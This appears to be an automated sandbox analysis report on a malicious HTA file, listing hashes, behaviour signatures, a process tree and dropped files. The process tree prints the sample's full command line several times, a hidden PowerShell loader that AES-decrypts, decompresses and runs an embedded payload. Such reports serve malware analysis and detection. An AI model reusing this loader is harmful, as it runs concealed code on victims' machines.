Analysis

  • max time kernel
    123s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    14-10-2023 00:28

General

  • Target

    deef9b58009eedec781267660e50de1ae404656d0d4b556feead857cd94b8156_JC.hta

  • Size

    1.3MB

  • MD5

    1d79ae342a84393e3b52a239e48e25db

  • SHA1

    4aaa0e4a1f56df8c163ed051e4ba140984748a31

  • SHA256

    deef9b58009eedec781267660e50de1ae404656d0d4b556feead857cd94b8156

  • SHA512

    340407374ef1ad16da7374f123b8f7dd0c5aedb24bce2d36a904d4385328b7b6a31729a8409d67795baff9a3832d3a48712c8e6cc32b6db8117371d227cc7f4a

  • SSDEEP

    6144:tkDlvmcFdKukb08m+dQx/EIAJyZffYISZ/:vZ/

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\deef9b58009eedec781267660e50de1ae404656d0d4b556feead857cd94b8156_JC.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2252
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $pBuoGDXT = 'AAAAAAAAAAAAAAAAAAAAAFy+EMbUMvMJo3vKX7LrHvmDj13fXzmwqXCpukEhyyUI3AMx77gvYbusHZ4hxYlVU7b2/Sd3M5o1gKIOs0WJ24rr1oGt1QjcJR0u3NktwuPs2/VpIzAn7139POKxJ6lBmvrjQSF6zJ0kduiPEdQIB8i/i0u99pH87kDKTAUlREAS8BTrdRka542T95/9Gc6656BNxpYEQf2QAxRYHSbxSWiQGFK/YgGoiSLE6ty0FG78OvKBAAdeDjCUaODS+cojLRmTGE8S1vEQlGREtiezmOWAS076dRIe2wCDC6NnlS/7gAR8+WmK7vFy05XyNOIdjsGJuNZeBO8FY5QWTZl+qEe8banPuit20enjY3ZXILJcy5NWBdrCjwW0ilqZuFyCKIVfr1+LweLD2ZSc7WDzGEK51pJkN2zJ9INVzDTBBpyNHAXP8pmQMB10Ly1p9MqLn3C3AnOHR6npswIMbfNnknsEPZ8RQMHDxyU+VxDNPmgbHlq3GKZ3cMUy6SNCK+TFshHkJmcmQ+Q1EmqIlO3pyqmtQlPn+sdL2DxeeTXFsXT6KgmEGXkW+0lgjJcWTMQW/tIrqVZOTWeavhOP8vqmMc3F6A/uNdgHwqWcnzwMWfCHdDpIiWS1i9fQiw16OkgrkpSVeDhzPdFBbt5+l+3AfgJXksblGAVuS2PLOWD8o/YYVL/KNhBRI0aKzyMs0r8/wWn0Pxew7PIKYt+m3JiB2OGNyfvlJ1f/hJ/ODb/VedoCvPN3hVHqJQk4eARpM6wjuDOQV2S2duJN9FtlEA5KQKKIwD7GsKfwRvxU4c9S+tk+M+kJ2oLGiaRqCTJsF4XAbbNI3qeUAbgqMvwo1iS95AoyJRAsuFMJpBbt5+hQIUNqWE9gH4FReZF3uRkJJ7/CWRpct8KisIa1rSX91r0l9pgvmJ98cu59P35V6Sipyjy3+GqSuxg7+/XLmefCBORQYye0zBk6QVmZduvldKPCGXfRt/6ng+yOpW9UIIRoH2SEwxt6n8bLKswRP7F4pBwrVxNEF60lXUid6jKg44E4gSzSKl1ayUh/olX4RPMdL7KBy8WKWbF2JQzZHkbhzarzH/eNfZn2Np5HjNWSkuCQIh0=';$Scxrc = 'dUdremhBRVpqWmdLT3NxRXlXanFtcHpGZWdRRVdoRmo=';$dLPDYZ = New-Object 'System.Security.Cryptography.AesManaged';$dLPDYZ.Mode = [System.Security.Cryptography.CipherMode]::ECB;$dLPDYZ.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$dLPDYZ.BlockSize = 128;$dLPDYZ.KeySize = 256;$dLPDYZ.Key = [System.Convert]::FromBase64String($Scxrc);$yEsDu = [System.Convert]::FromBase64String($pBuoGDXT);$qyDTpjIY = $yEsDu[0..15];$dLPDYZ.IV = $qyDTpjIY;$uTpbZaIXi = $dLPDYZ.CreateDecryptor();$tpRGoQYrw = $uTpbZaIXi.TransformFinalBlock($yEsDu, 16, $yEsDu.Length - 16);$dLPDYZ.Dispose();$wmhF = New-Object System.IO.MemoryStream( , $tpRGoQYrw );$EyecAc = New-Object System.IO.MemoryStream;$sVIbzvgSN = New-Object System.IO.Compression.GzipStream $wmhF, ([IO.Compression.CompressionMode]::Decompress);$sVIbzvgSN.CopyTo( $EyecAc );$sVIbzvgSN.Close();$wmhF.Close();[byte[]] $AXQUFdWN = $EyecAc.ToArray();$GTChecsr = [System.Text.Encoding]::UTF8.GetString($AXQUFdWN);$GTChecsr | powershell - }
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2120
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c powershell.exe $pBuoGDXT = 'AAAAAAAAAAAAAAAAAAAAAFy+EMbUMvMJo3vKX7LrHvmDj13fXzmwqXCpukEhyyUI3AMx77gvYbusHZ4hxYlVU7b2/Sd3M5o1gKIOs0WJ24rr1oGt1QjcJR0u3NktwuPs2/VpIzAn7139POKxJ6lBmvrjQSF6zJ0kduiPEdQIB8i/i0u99pH87kDKTAUlREAS8BTrdRka542T95/9Gc6656BNxpYEQf2QAxRYHSbxSWiQGFK/YgGoiSLE6ty0FG78OvKBAAdeDjCUaODS+cojLRmTGE8S1vEQlGREtiezmOWAS076dRIe2wCDC6NnlS/7gAR8+WmK7vFy05XyNOIdjsGJuNZeBO8FY5QWTZl+qEe8banPuit20enjY3ZXILJcy5NWBdrCjwW0ilqZuFyCKIVfr1+LweLD2ZSc7WDzGEK51pJkN2zJ9INVzDTBBpyNHAXP8pmQMB10Ly1p9MqLn3C3AnOHR6npswIMbfNnknsEPZ8RQMHDxyU+VxDNPmgbHlq3GKZ3cMUy6SNCK+TFshHkJmcmQ+Q1EmqIlO3pyqmtQlPn+sdL2DxeeTXFsXT6KgmEGXkW+0lgjJcWTMQW/tIrqVZOTWeavhOP8vqmMc3F6A/uNdgHwqWcnzwMWfCHdDpIiWS1i9fQiw16OkgrkpSVeDhzPdFBbt5+l+3AfgJXksblGAVuS2PLOWD8o/YYVL/KNhBRI0aKzyMs0r8/wWn0Pxew7PIKYt+m3JiB2OGNyfvlJ1f/hJ/ODb/VedoCvPN3hVHqJQk4eARpM6wjuDOQV2S2duJN9FtlEA5KQKKIwD7GsKfwRvxU4c9S+tk+M+kJ2oLGiaRqCTJsF4XAbbNI3qeUAbgqMvwo1iS95AoyJRAsuFMJpBbt5+hQIUNqWE9gH4FReZF3uRkJJ7/CWRpct8KisIa1rSX91r0l9pgvmJ98cu59P35V6Sipyjy3+GqSuxg7+/XLmefCBORQYye0zBk6QVmZduvldKPCGXfRt/6ng+yOpW9UIIRoH2SEwxt6n8bLKswRP7F4pBwrVxNEF60lXUid6jKg44E4gSzSKl1ayUh/olX4RPMdL7KBy8WKWbF2JQzZHkbhzarzH/eNfZn2Np5HjNWSkuCQIh0=';$Scxrc = 'dUdremhBRVpqWmdLT3NxRXlXanFtcHpGZWdRRVdoRmo=';$dLPDYZ = New-Object 'System.Security.Cryptography.AesManaged';$dLPDYZ.Mode = [System.Security.Cryptography.CipherMode]::ECB;$dLPDYZ.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$dLPDYZ.BlockSize = 128;$dLPDYZ.KeySize = 256;$dLPDYZ.Key = [System.Convert]::FromBase64String($Scxrc);$yEsDu = [System.Convert]::FromBase64String($pBuoGDXT);$qyDTpjIY = $yEsDu[0..15];$dLPDYZ.IV = $qyDTpjIY;$uTpbZaIXi = $dLPDYZ.CreateDecryptor();$tpRGoQYrw = $uTpbZaIXi.TransformFinalBlock($yEsDu, 16, $yEsDu.Length - 16);$dLPDYZ.Dispose();$wmhF = New-Object System.IO.MemoryStream( , $tpRGoQYrw );$EyecAc = New-Object System.IO.MemoryStream;$sVIbzvgSN = New-Object System.IO.Compression.GzipStream $wmhF, ([IO.Compression.CompressionMode]::Decompress);$sVIbzvgSN.CopyTo( $EyecAc );$sVIbzvgSN.Close();$wmhF.Close();[byte[]] $AXQUFdWN = $EyecAc.ToArray();$GTChecsr = [System.Text.Encoding]::UTF8.GetString($AXQUFdWN);$GTChecsr | powershell -
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2628
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe $pBuoGDXT = 'AAAAAAAAAAAAAAAAAAAAAFy+EMbUMvMJo3vKX7LrHvmDj13fXzmwqXCpukEhyyUI3AMx77gvYbusHZ4hxYlVU7b2/Sd3M5o1gKIOs0WJ24rr1oGt1QjcJR0u3NktwuPs2/VpIzAn7139POKxJ6lBmvrjQSF6zJ0kduiPEdQIB8i/i0u99pH87kDKTAUlREAS8BTrdRka542T95/9Gc6656BNxpYEQf2QAxRYHSbxSWiQGFK/YgGoiSLE6ty0FG78OvKBAAdeDjCUaODS+cojLRmTGE8S1vEQlGREtiezmOWAS076dRIe2wCDC6NnlS/7gAR8+WmK7vFy05XyNOIdjsGJuNZeBO8FY5QWTZl+qEe8banPuit20enjY3ZXILJcy5NWBdrCjwW0ilqZuFyCKIVfr1+LweLD2ZSc7WDzGEK51pJkN2zJ9INVzDTBBpyNHAXP8pmQMB10Ly1p9MqLn3C3AnOHR6npswIMbfNnknsEPZ8RQMHDxyU+VxDNPmgbHlq3GKZ3cMUy6SNCK+TFshHkJmcmQ+Q1EmqIlO3pyqmtQlPn+sdL2DxeeTXFsXT6KgmEGXkW+0lgjJcWTMQW/tIrqVZOTWeavhOP8vqmMc3F6A/uNdgHwqWcnzwMWfCHdDpIiWS1i9fQiw16OkgrkpSVeDhzPdFBbt5+l+3AfgJXksblGAVuS2PLOWD8o/YYVL/KNhBRI0aKzyMs0r8/wWn0Pxew7PIKYt+m3JiB2OGNyfvlJ1f/hJ/ODb/VedoCvPN3hVHqJQk4eARpM6wjuDOQV2S2duJN9FtlEA5KQKKIwD7GsKfwRvxU4c9S+tk+M+kJ2oLGiaRqCTJsF4XAbbNI3qeUAbgqMvwo1iS95AoyJRAsuFMJpBbt5+hQIUNqWE9gH4FReZF3uRkJJ7/CWRpct8KisIa1rSX91r0l9pgvmJ98cu59P35V6Sipyjy3+GqSuxg7+/XLmefCBORQYye0zBk6QVmZduvldKPCGXfRt/6ng+yOpW9UIIRoH2SEwxt6n8bLKswRP7F4pBwrVxNEF60lXUid6jKg44E4gSzSKl1ayUh/olX4RPMdL7KBy8WKWbF2JQzZHkbhzarzH/eNfZn2Np5HjNWSkuCQIh0=';$Scxrc = 'dUdremhBRVpqWmdLT3NxRXlXanFtcHpGZWdRRVdoRmo=';$dLPDYZ = New-Object 'System.Security.Cryptography.AesManaged';$dLPDYZ.Mode = [System.Security.Cryptography.CipherMode]::ECB;$dLPDYZ.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$dLPDYZ.BlockSize = 128;$dLPDYZ.KeySize = 256;$dLPDYZ.Key = [System.Convert]::FromBase64String($Scxrc);$yEsDu = [System.Convert]::FromBase64String($pBuoGDXT);$qyDTpjIY = $yEsDu[0..15];$dLPDYZ.IV = $qyDTpjIY;$uTpbZaIXi = $dLPDYZ.CreateDecryptor();$tpRGoQYrw = $uTpbZaIXi.TransformFinalBlock($yEsDu, 16, $yEsDu.Length - 16);$dLPDYZ.Dispose();$wmhF = New-Object System.IO.MemoryStream( , $tpRGoQYrw );$EyecAc = New-Object System.IO.MemoryStream;$sVIbzvgSN = New-Object System.IO.Compression.GzipStream $wmhF, ([IO.Compression.CompressionMode]::Decompress);$sVIbzvgSN.CopyTo( $EyecAc );$sVIbzvgSN.Close();$wmhF.Close();[byte[]] $AXQUFdWN = $EyecAc.ToArray();$GTChecsr = [System.Text.Encoding]::UTF8.GetString($AXQUFdWN);$GTChecsr
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2484
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2504

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AS285YZFODVTH30UJLIT.temp

    Filesize

    7KB

    MD5

    dad72959f528c14140397f205f9ee04b

    SHA1

    7ea96b1ca173f60c1c5311023fa1cd1947f98446

    SHA256

    5b83777337e49ecca1994e36a9011a9305c35cc656113dbbe3284e25689d7c68

    SHA512

    8595925419521b18332fce2200f64d5e86514615b2dce5ead4bf9a89699b070ff5aff4c9f4e20cec2c13ff4b1c8cb854acbadc9b848e159a84ebef38f389b9d6

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    dad72959f528c14140397f205f9ee04b

    SHA1

    7ea96b1ca173f60c1c5311023fa1cd1947f98446

    SHA256

    5b83777337e49ecca1994e36a9011a9305c35cc656113dbbe3284e25689d7c68

    SHA512

    8595925419521b18332fce2200f64d5e86514615b2dce5ead4bf9a89699b070ff5aff4c9f4e20cec2c13ff4b1c8cb854acbadc9b848e159a84ebef38f389b9d6

  • memory/2120-16-0x0000000073650000-0x0000000073BFB000-memory.dmp

    Filesize

    5.7MB

  • memory/2120-14-0x00000000027C0000-0x0000000002800000-memory.dmp

    Filesize

    256KB

  • memory/2120-15-0x00000000027C0000-0x0000000002800000-memory.dmp

    Filesize

    256KB

  • memory/2120-13-0x00000000027C0000-0x0000000002800000-memory.dmp

    Filesize

    256KB

  • memory/2120-11-0x0000000073650000-0x0000000073BFB000-memory.dmp

    Filesize

    5.7MB

  • memory/2120-12-0x0000000073650000-0x0000000073BFB000-memory.dmp

    Filesize

    5.7MB

  • memory/2484-28-0x0000000002700000-0x0000000002740000-memory.dmp

    Filesize

    256KB

  • memory/2484-27-0x0000000073650000-0x0000000073BFB000-memory.dmp

    Filesize

    5.7MB

  • memory/2484-29-0x0000000073650000-0x0000000073BFB000-memory.dmp

    Filesize

    5.7MB

  • memory/2484-32-0x0000000073650000-0x0000000073BFB000-memory.dmp

    Filesize

    5.7MB

  • memory/2504-30-0x0000000073650000-0x0000000073BFB000-memory.dmp

    Filesize

    5.7MB

  • memory/2504-31-0x0000000073650000-0x0000000073BFB000-memory.dmp

    Filesize

    5.7MB

  • memory/2504-33-0x0000000073650000-0x0000000073BFB000-memory.dmp

    Filesize

    5.7MB